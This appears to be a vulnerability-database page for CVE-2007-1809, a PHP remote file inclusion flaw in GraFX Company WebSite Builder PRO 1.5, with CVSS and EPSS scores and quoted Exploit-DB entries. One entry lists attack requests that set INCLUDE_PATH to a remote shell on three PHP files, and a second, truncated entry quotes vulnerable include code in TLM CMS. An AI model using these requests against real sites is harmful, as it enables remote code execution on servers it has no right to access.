CVE-2007-1809
published 2007-04-02CVE-2007-1809: Multiple PHP remote file inclusion vulnerabilities in GraFX Company WebSite Builder (CWB) PRO 1.5 allow remote attackers to execute arbitrary PHP code via a…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.37%
94.3th percentile
Multiple PHP remote file inclusion vulnerabilities in GraFX Company WebSite Builder (CWB) PRO 1.5 allow remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter to (1) cls_headline_prod.php, (2) cls_listorders.php, or (3) cls_viewpastorders.php in include/, different vectors than CVE-2007-1513.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| grafx_software | company_website_builder | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion
exploitdb·2007-04-01
CVE-2007-1809 CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion
CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion
---
# CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites
# D.Script: http://codewalkers.com/codefiles/373_cwbs1.5_demo.zip
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/include/cls_headline_prod.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_listorders.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_viewpastorders.php?INCLUDE_PATH=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# milw0rm.com [2007-04-01]
Exploit-DB
TLM CMS 1.1 - 'i-accueil.php?chemin' Remote File Inclusion
exploitdb·2007-01-12
CVE-2007-0300 TLM CMS 1.1 - 'i-accueil.php?chemin' Remote File Inclusion
TLM CMS 1.1 - 'i-accueil.php?chemin' Remote File Inclusion
---
/###################################################################\
# Citations Aléatoires v1.1 #
# ========================================================= #
# Published : 2007-01-12 #
# Remote: Yes #
# Site: ftp://ftp1.comscripts.com/PHP/1809_citation-11.zip #
#####################################################################
# Author: GolD_M = Mahmood_ali #
# Contact: [email protected] #
# ===================================================== #
# ThanX =All My Friends& ABDULLAH00& AsbMay& ToOoFa& KaBaRa& str0ke #
# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team #
\###################################################################/
# /i-accueil.php #
# Line: #
# /13 #
# Vulnerable Code: #
# include("$chemin/mod_news/inde
No writeups or analysis indexed.
http://osvdb.org/35226http://osvdb.org/35227http://osvdb.org/35228http://www.attrition.org/pipermail/vim/2007-April/001482.htmlhttp://www.securityfocus.com/bid/23242https://exchange.xforce.ibmcloud.com/vulnerabilities/33351https://www.exploit-db.com/exploits/3628http://osvdb.org/35226http://osvdb.org/35227http://osvdb.org/35228http://www.attrition.org/pipermail/vim/2007-April/001482.htmlhttp://www.securityfocus.com/bid/23242https://exchange.xforce.ibmcloud.com/vulnerabilities/33351https://www.exploit-db.com/exploits/3628
2007-04-02
Published